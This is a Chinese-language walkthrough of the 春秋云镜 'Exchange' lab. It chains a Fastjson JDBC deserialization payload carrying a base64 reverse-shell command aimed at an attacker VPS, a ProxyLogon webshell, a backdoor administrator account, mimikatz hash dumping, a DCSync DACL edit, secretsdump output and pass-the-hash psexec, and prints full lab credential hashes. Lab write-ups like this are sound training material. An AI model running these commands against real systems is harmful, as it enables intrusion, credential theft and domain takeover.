春秋云镜-Exchange

本文最后更新于 2025年9月14日 晚上

Fastjson+JDBC,Exchange 服务 Microsoft Exchange Proxylogon 利用,WirteDacl 权限,哈希传递攻击

信息收集

fscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
D:\aWeb\fscan-main>.\fscan.exe -h 39.98.107.181

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.98.107.181:80 open
39.98.107.181:22 open
39.98.107.181:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.98.107.181      code:200 len:219    title:None
[*] WebTitle http://39.98.107.181:8000 code:302 len:0      title:None 跳转url: http://39.98.107.181:8000/login.html
[*] WebTitle http://39.98.107.181:8000/login.html code:200 len:5662   title:Lumia ERP
已完成 3/3
[*] 扫描结束,耗时: 50.5764704s

Fastjson + JDBC 利用

有 web 页面,Lumia ERP 登陆界面,admin:123456 弱口令登陆进去

点击 “官方插件” 跳转到了一个网站,但显示域名已过期

1
http://www.huaxiaerp.com/forum-43-1.html

搜索后发现是 华夏 ERP,存在 fastjson 漏洞,位置于 /user/list?search=

1
{"@type":"java.net.Inet4Address","val":"test.ot5kfv.dnslog.cn"}

poc 如下

1
/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%62%75%74%74%33%72%66%31%79%2e%73%74%6a%32%33%61%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%0a

dnslog 测试成功,可以利用

打 JDBC-JDBC4Connection:手把手带你深入分析 Fastjson JDBC 调用链利用过程-先知社区

启动 evil-mysql-server 服务器

1
./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar

url 编码后发送反弹 shell 命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "vpsIP地址",
		"portToConnectTo": 3306,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,base64编码后的命令}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}

1
flag01: flag{846e59ef-3802-4db5-bd3e-e004d70c0af4}

内网信息收集

查看本机 IP:172.22.3.12

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:2b:7f:46  
          inet addr:172.22.3.12  Bcast:172.22.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe2b:7f46/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:174430 errors:0 dropped:0 overruns:0 frame:0
          TX packets:52652 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:212622994 (212.6 MB)  TX bytes:27000176 (27.0 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:10258 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10258 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:2732393 (2.7 MB)  TX bytes:2732393 (2.7 MB)

fscan 扫内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# ./FScan_2.0.1_linux_x64 -h 172.22.3.12/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.9s]     已选择服务扫描模式
[1.9s]     开始信息扫描
[1.9s]     CIDR范围: 172.22.3.0-172.22.3.255
[1.9s]     generate_ip_range_full
[1.9s]     解析CIDR 172.22.3.12/24 -> IP范围 172.22.3.0-172.22.3.255
[1.9s]     最终有效主机数量: 256
[1.9s]     开始主机扫描
[1.9s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.3.12     存活 (ICMP)
[1.9s] [*] 目标 172.22.3.2      存活 (ICMP)
[1.9s] [*] 目标 172.22.3.26     存活 (ICMP)
[1.9s] [*] 目标 172.22.3.9      存活 (ICMP)
[4.9s]     存活主机数量: 4
[4.9s]     有效端口数量: 233
[4.9s] [*] 端口开放 172.22.3.12:80
[4.9s] [*] 端口开放 172.22.3.12:22
[4.9s] [*] 端口开放 172.22.3.26:139
[4.9s] [*] 端口开放 172.22.3.26:135
[5.0s] [*] 端口开放 172.22.3.12:8000
[5.0s] [*] 端口开放 172.22.3.26:445
[5.0s] [*] 端口开放 172.22.3.2:135
[5.0s] [*] 端口开放 172.22.3.2:445
[5.0s] [*] 端口开放 172.22.3.2:389
[5.0s] [*] 端口开放 172.22.3.2:139
[5.0s] [*] 端口开放 172.22.3.2:88
[5.0s] [*] 端口开放 172.22.3.9:808
[5.0s] [*] 端口开放 172.22.3.9:443
[5.0s] [*] 端口开放 172.22.3.9:139
[5.0s] [*] 端口开放 172.22.3.9:445
[5.0s] [*] 端口开放 172.22.3.9:135
[5.0s] [*] 端口开放 172.22.3.9:81
[5.0s] [*] 端口开放 172.22.3.9:80
[5.0s] [*] 端口开放 172.22.3.9:8172
[6.0s]     扫描完成, 发现 19 个开放端口
[6.0s]     存活端口数量: 19
[6.0s]     开始漏洞扫描
[6.1s] [*] 网站标题 http://172.22.3.12        状态码:200 长度:19813  标题:lumia
[6.1s]     POC加载完成: 总共387个,成功387个,失败0
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.3.26
主机名: XIAORANG-PC
发现的网络接口:
   IPv4地址:
      └─ 172.22.3.26
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.3.9
主机名: XIAORANG-EXC01
发现的网络接口:
   IPv4地址:
      └─ 172.22.3.9
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.3.2
主机名: XIAORANG-WIN16
发现的网络接口:
   IPv4地址:
      └─ 172.22.3.2
[6.1s] [+] NetBios 172.22.3.2      DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393
[6.2s] [+] NetBios 172.22.3.26     XIAORANG\XIAORANG-PC          
[6.2s] [+] NetBios 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393
[6.2s]     系统信息 172.22.3.2 [Windows Server 2016 Datacenter 14393]
[6.4s] [*] 网站标题 http://172.22.3.12:8000   状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.3.12:8000/login.html
[6.5s] [*] 网站标题 http://172.22.3.9:81      状态码:403 长度:1157   标题:403 - 禁止访问: 访问被拒绝。
[6.6s] [*] 网站标题 http://172.22.3.12:8000/login.html 状态码:200 长度:5662   标题:Lumia ERP
[7.4s] [*] 网站标题 http://172.22.3.9         状态码:403 长度:0      标题:无标题
[7.8s] [*] 网站标题 https://172.22.3.9        状态码:302 长度:0      标题:无标题 重定向地址: https://172.22.3.9/owa/
[8.5s] [*] 网站标题 https://172.22.3.9/owa/   状态码:200 长度:28237  标题:Outlook
[10.0s] [*] 网站标题 https://172.22.3.9:8172   状态码:404 长度:0      标题:无标题
[1m51s]     扫描已完成: 36/36

得到以下信息

1
2
3
4
172.22.3.12		本机
172.22.3.2      DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016		域控
172.22.3.26     XIAORANG\XIAORANG-PC          
172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016

并且还发现 172.22.3.9 这台机器有 Outlook

Microsoft Exchange Proxylogon 利用

Exchange 邮箱,需要账户密码登录,尝试 ProxyLogon 拿 shell 写后门账户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
└─# proxychains -q python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

  _____                     _
 |  __ \                   | |
 | |__) | __ _____  ___   _| |     ___   __ _  ___  _ __
 |  ___/ '__/ _ \ \/ / | | | |    / _ \ / _` |/ _ \| '_ \
 | |   | | | (_) >  <| |_| | |___| (_) | (_| | (_) | | | |
 |_|   |_|  \___/_/\_ \__, |______\___/ \__, |\___/|_| |_|
                       __/ |             __/ |
                      |___/             |___/

Original PoC by https://github.com/testanull
Author: @Haus3c


Target: 172.22.3.9
=============================
[+] Attempting SSRF
DN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
SID: S-1-5-21-533686307-2117412543-4200729784-500
[+] SSRF Successful!
[+] Attempting Arbitrary File Write
SessionID: 23b19d1f-c638-4d75-83d0-74d85b8d356d
CanaryToken: GkMzES3LNUi6llExSnZZ6_LKm-x5790IJH9pqaX_2gYs0WxfcWZBqRKicw80OlhHtZ9z4N1IQMI.
OABId: 6d8fb74b-8477-43ee-83ba-0b119205e85f
[+] Success! Entering webshell. Type 'quit' or 'exit' to escape.

# whoami
nt authority\system

# net user butt3rf1y butt3r_f1y! /add

# net localgroup administrators butt3rf1y /add

rdp 登进去拿 flag

1
flag02: flag{70a3a53a-dc66-45bb-a7d0-75edf74d006d}

通过 WirteDacl 权限打 DCSync

查看任务管理器发现还有另一个用户在线

用 minikataz 抓一下用户 hash,抓到域内 Zhangtong 和 XIAORANG-EXC01$ 机器用户的哈希

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Authentication Id : 0 ; 2025799 (00000000:001ee947)
Session           : RemoteInteractive from 2
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/9/7 14:32:28
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
        
Authentication Id : 0 ; 1867480 (00000000:001c7ed8)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/9/7 14:32:22
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : bc2aaa56d33a9080b44fbe2d44b520b5
         * SHA1     : 67ae100419abf0f216f927571cb12ee55c209132
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : b5 92 7e 8c bd 05 90 45 5d c3 d4 ee 2f bf a3 04 65 8b 06 f6 b5 48 52 7f a9 33 12 87 a8 f5 94 38 90 13 b1 5d ab f0 73 63 81 79 8e 7d d9 08 02 1d ba 7f f8 b9 a5 97 23 97 3c 9c 1d b0 a8 89 b7 48 ba 52 10 1d e7 80 cb a4 fd 9e 2a db 5a cd 40 ae 2a c7 5d 00 fb 6d c5 41 a0 a7 17 c3 4c 5f e4 3e f0 5a 10 a9 8e f0 97 24 f9 69 56 bf ed 2b 54 34 5b 65 6d af 96 15 cb 4d b9 6a b9 5b 42 2e a3 7d df e6 1c 9b 28 ca 04 82 4a 80 f2 5d a9 72 2b 6f e0 21 f7 c0 d8 11 8f f0 6d 15 98 10 48 d6 6c f8 e7 e9 92 36 9e 1e 9c e2 e7 dc a5 f4 fe a8 ed 4b 1d 7a 5d 8f 55 f5 1e 45 58 ce 30 cc 09 49 b3 b8 09 b8 3a fe 27 1f 10 74 7d 4e 73 c4 af db 39 94 a5 c6 2b e3 22 2f 04 b7 9b 75 f0 72 ac b5 6f 21 d0 3c cb 82 0f 49 76 c4 83 bf df db 0f 3f 2e 57
        ssp :
        credman :

dump 域信息分析

1
proxychains -q bloodhound-python -d xiaorang.lab -u 'Zhangtong' --hashes 22c7f81993e96ac83ac2f3f1903de8b4:22c7f81993e96ac83ac2f3f1903de8b4 -dc XIAORANG-WIN16.xiaorang.lab -c all -ns 172.22.3.2 --zip --dns-tcp

发现 web 的机器用户有 WirteDacl 权限

那么打 DCsync

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
└─# proxychains -q impacket-dacledit 'XIAORANG.LAB'/'XIAORANG-EXC01$' -hashes bc2aaa56d33a9080b44fbe2d44b520b5:bc2aaa56d33a9080b44fbe2d44b520b5 -action write -rights DCSync -principal 'XIAORANG-EXC01$' -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
  'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
  'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
  'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
  'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
  'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
  'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
  'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250907-171134.bak
[*] DACL modified successfully!

然后直接 dump 下来域内所有哈希

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
└─# proxychains -q impacket-secretsdump 'XIAORANG.LAB'/'XIAORANG-EXC01$'@172.22.3.2 -hashes bc2aaa56d33a9080b44fbe2d44b520b5:bc2aaa56d33a9080b44fbe2d44b520b5
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:00d8a86839e3a99044a6bd793102dc31:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:f6eef9918e591ca09c721976db49a5d4:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:9b7e332d6adcb4d62cae212d0c8038b8:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:bc2aaa56d33a9080b44fbe2d44b520b5:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:6e136574f98f5d76aa1d5557e71b2edd:::
[*] Kerberos keys grabbed
xiaorang.lab\Administrator:aes256-cts-hmac-sha1-96:d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
xiaorang.lab\Administrator:aes128-cts-hmac-sha1-96:8b17084cfa8d1c1d37c13201d68ec0cf
xiaorang.lab\Administrator:des-cbc-md5:d9c4a4d5348f0d73
krbtgt:aes256-cts-hmac-sha1-96:951d91f55df01d8e3013f433c695fd9684ac2f9f5c08fa815f751c894ca749f9
krbtgt:aes128-cts-hmac-sha1-96:7aa1c6c1f4080fdbf150cf5b6385c480
krbtgt:des-cbc-md5:700d434046231a9e
xiaorang.lab\HealthMailbox8446c5b:aes256-cts-hmac-sha1-96:e34d601b6af9400b61602b8c9f71686f0393a97168db256adda27558816c4112
xiaorang.lab\HealthMailbox8446c5b:aes128-cts-hmac-sha1-96:34f030ea99be5779376807998952ee81
xiaorang.lab\HealthMailbox8446c5b:des-cbc-md5:4675ef8c15862329
xiaorang.lab\HealthMailbox0d5918e:aes256-cts-hmac-sha1-96:dc5bb8f5cebfb09275e74f1fbb80a7eae044a064202a5b291aa09700909cabb5
xiaorang.lab\HealthMailbox0d5918e:aes128-cts-hmac-sha1-96:fa2569ff74ac4ef0145b684535b9db26
xiaorang.lab\HealthMailbox0d5918e:des-cbc-md5:b05ed989c78304fb
xiaorang.lab\HealthMailboxeda7a84:aes256-cts-hmac-sha1-96:0dfb6bdfa6f3592f55baf1c228686597e00b1361eca1441a1fdf0c3599507fd7
xiaorang.lab\HealthMailboxeda7a84:aes128-cts-hmac-sha1-96:f20b096f3ad270e4c36876fd0f1f4a09
xiaorang.lab\HealthMailboxeda7a84:des-cbc-md5:3458ec32a815ce0b
xiaorang.lab\HealthMailbox33b01cf:aes256-cts-hmac-sha1-96:801e2feead7ae5074578fad5eac0d3dabd92f0445068e0a69232ce5bd8ca76f4
xiaorang.lab\HealthMailbox33b01cf:aes128-cts-hmac-sha1-96:3136e1be7138a8d29fa10bc3f2cf6f99
xiaorang.lab\HealthMailbox33b01cf:des-cbc-md5:3283a2dc518680f7
xiaorang.lab\HealthMailbox9570292:aes256-cts-hmac-sha1-96:f3aba1d52f3131e46d916fbd04817b43281b76b86b56dad24f808538e91363cc
xiaorang.lab\HealthMailbox9570292:aes128-cts-hmac-sha1-96:ee9802236d43d7e5695190232c044d63
xiaorang.lab\HealthMailbox9570292:des-cbc-md5:37d30719e940d679
xiaorang.lab\HealthMailbox3479a75:aes256-cts-hmac-sha1-96:721d8bcbbe316a0ec1a7f0aa3ce3519b4d7c3281a571e900b41384e5583d2c84
xiaorang.lab\HealthMailbox3479a75:aes128-cts-hmac-sha1-96:18353920e23e46ef0a834fe5cd5a481b
xiaorang.lab\HealthMailbox3479a75:des-cbc-md5:8a3d2cf261386ba8
xiaorang.lab\HealthMailbox2d45c5b:aes256-cts-hmac-sha1-96:ff6aac30c110e42185c90561d0befebb0b462553737d05aec9c6dcb660612ffd
xiaorang.lab\HealthMailbox2d45c5b:aes128-cts-hmac-sha1-96:5117b1a04caa9925f508eeb0bd6ffa35
xiaorang.lab\HealthMailbox2d45c5b:des-cbc-md5:df2ca48c1525dccb
xiaorang.lab\HealthMailboxec2d542:aes256-cts-hmac-sha1-96:a63a5cb34f7d503c61af2a96508ed826b0ad4daf10198f2b709b75bc58789e90
xiaorang.lab\HealthMailboxec2d542:aes128-cts-hmac-sha1-96:bfe7ece929174b6ba1d643e87f37cf7a
xiaorang.lab\HealthMailboxec2d542:des-cbc-md5:5bf42601e608df31
xiaorang.lab\HealthMailboxf5f7dbd:aes256-cts-hmac-sha1-96:824ea1eadc05dc8b0ed26c3ff0696c9e2fc145ad2d08dd5dbb1c6428f4eb074f
xiaorang.lab\HealthMailboxf5f7dbd:aes128-cts-hmac-sha1-96:c62918a735c4fde6b5db99d9c441200c
xiaorang.lab\HealthMailboxf5f7dbd:des-cbc-md5:46e654e5649d6732
xiaorang.lab\HealthMailbox67dc103:aes256-cts-hmac-sha1-96:c439db29ecbe032623449f1298a0537e6ed26c71dbd457574ac710c0e7c175e4
xiaorang.lab\HealthMailbox67dc103:aes128-cts-hmac-sha1-96:a952200f4f439c33c289f5a5408f902b
xiaorang.lab\HealthMailbox67dc103:des-cbc-md5:751013ef3ee36225
xiaorang.lab\HealthMailbox320fc73:aes256-cts-hmac-sha1-96:a00af0ea0627c6497a806ebcd11c432f7c9658044ca4947438bfca3e371a8363
xiaorang.lab\HealthMailbox320fc73:aes128-cts-hmac-sha1-96:af5f9c02443cef462bb6b5456b296d60
xiaorang.lab\HealthMailbox320fc73:des-cbc-md5:1949dc2c7c98bc20
xiaorang.lab\Lumia:aes256-cts-hmac-sha1-96:25e42c5502cfc032897686857062bba71a6b845a3005c467c9aeebf10d3fa850
xiaorang.lab\Lumia:aes128-cts-hmac-sha1-96:1f95632f869be1726ff256888e961775
xiaorang.lab\Lumia:des-cbc-md5:313db53e68ecf4ce
Zhangtong:aes256-cts-hmac-sha1-96:ae16478a2d05fedf251d0050146d8d2e24608aa3d95f014acd5acb9eb8896bd5
Zhangtong:aes128-cts-hmac-sha1-96:970b0820700dfa60e2c7c1af1d4bbdd1
Zhangtong:des-cbc-md5:9b61b3583140c4b5
XIAORANG-WIN16$:aes256-cts-hmac-sha1-96:168e6cf85d503904792474fe1ae9fe04b3706402ad0dad11f17039f92f6ed033
XIAORANG-WIN16$:aes128-cts-hmac-sha1-96:434eda0e158169b3ec9cfc36eb0b56c8
XIAORANG-WIN16$:des-cbc-md5:fe457f9716d33b68
XIAORANG-EXC01$:aes256-cts-hmac-sha1-96:76253835716e7b41cada5d7ef47e2503e3d9638be1b481878e8fc5db0ad7baa1
XIAORANG-EXC01$:aes128-cts-hmac-sha1-96:c322f45c7e5a37bfc0feefbe09fafd65
XIAORANG-EXC01$:des-cbc-md5:6de546da467fbaf8
XIAORANG-PC$:aes256-cts-hmac-sha1-96:2b8247145b4d99664affb06d332f9a1ae55af8068e27d0b0deb11d0ace8353a9
XIAORANG-PC$:aes128-cts-hmac-sha1-96:7304e348a7fbec88bb643d729bba3994
XIAORANG-PC$:des-cbc-md5:a1452ca192fec767
[*] Cleaning up...

拿到域管 hash,接下来进行横向

1
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::

psexec 登入域管拿下域控

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
└─# proxychains -q impacket-psexec xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec GBK
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 172.22.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file NmVfoAWG.exe
[*] Opening SVCManager on 172.22.3.2.....
[*] Creating service Qcsg on 172.22.3.2.....
[*] Starting service Qcsg.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。

C:\Windows\system32> cd C:\users\administrator

C:\Users\Administrator> dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 0637-3CEF

 C:\Users\Administrator 的目录

2022/10/23  21:34    <DIR>          .
2022/10/23  21:34    <DIR>          ..
2022/10/23  14:34    <DIR>          Contacts
2022/10/23  14:34    <DIR>          Desktop
2022/10/23  14:34    <DIR>          Documents
